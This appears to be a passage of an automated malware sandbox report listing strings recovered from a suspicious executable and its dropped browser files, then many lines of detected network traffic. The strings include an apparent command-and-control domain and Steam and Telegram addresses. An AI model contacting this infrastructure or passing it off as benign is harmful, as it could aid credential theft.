                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                  Source: HubApps Icons.15.dr, d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://frostman.shop
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/(
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/)
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1296559926.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/8
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/D
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/K
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1296559926.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/S
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/W
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/g
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1296559926.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/h
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/o
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/tman.shop/
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/tman.shop/8
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1296559926.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/~
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://frostman.shop;
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://frostman.shopZMYM
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://gaana.com/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                  Source: BA168G.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://m.kugou.com/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://m.soundcloud.com/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://m.vk.com/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
                  Source: Cookies.16.drString found in binary or memory: https://msn.comXID/
                  Source: Cookies.16.drString found in binary or memory: https://msn.comXIDv10Au_
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://music.amazon.com
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://music.apple.com
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://music.yandex.com
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                  Source: 000003.log6.15.drString found in binary or memory: https://ntp.msn.com
                  Source: 000003.log0.15.dr, 000003.log3.15.drString found in binary or memory: https://ntp.msn.com/
                  Source: 000003.log0.15.drString found in binary or memory: https://ntp.msn.com/0
                  Source: QuotaManager.15.drString found in binary or memory: https://ntp.msn.com/_default
                  Source: 000003.log0.15.dr, 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                  Source: Session_13379154135195885.15.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                  Source: QuotaManager.15.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                  Source: 2cc80dabc69f58b6_0.15.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://open.spotify.com
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://outlook.live.com/mail/0/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://outlook.office.com/mail/0/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://sb.scorecardresearch.com/
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://srtb.msn.cn/
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://srtb.msn.com/
                  Source: pjthjsdjgjrtavv.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                  Source: pjthjsdjgjrtavv.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/8
                  Source: pjthjsdjgjrtavv.exeString found in binary or memory: https://t.me/k04ael
                  Source: pjthjsdjgjrtavv.exeString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://tidal.com/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://twitter.com/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://vibe.naver.com/today
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1269724485.00000000009EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://web.telegram.org/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://web.whatsapp.com
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1966618545.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, BA168G.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.deezer.com/
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, YM7G4E.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: content.js.15.dr, content_new.js.15.drString found in binary or memory: https://www.google.com/chrome
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: 9e0507af-53af-4fdd-9eb3-e9b80c92e238.tmp.16.drString found in binary or memory: https://www.googleapis.com
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.iheart.com/podcast/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.instagram.com
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1966618545.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, BA168G.0.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.last.fm/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.messenger.com
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.office.com
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.tiktok.com/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://www.youtube.com
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://y.music.163.com/m/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
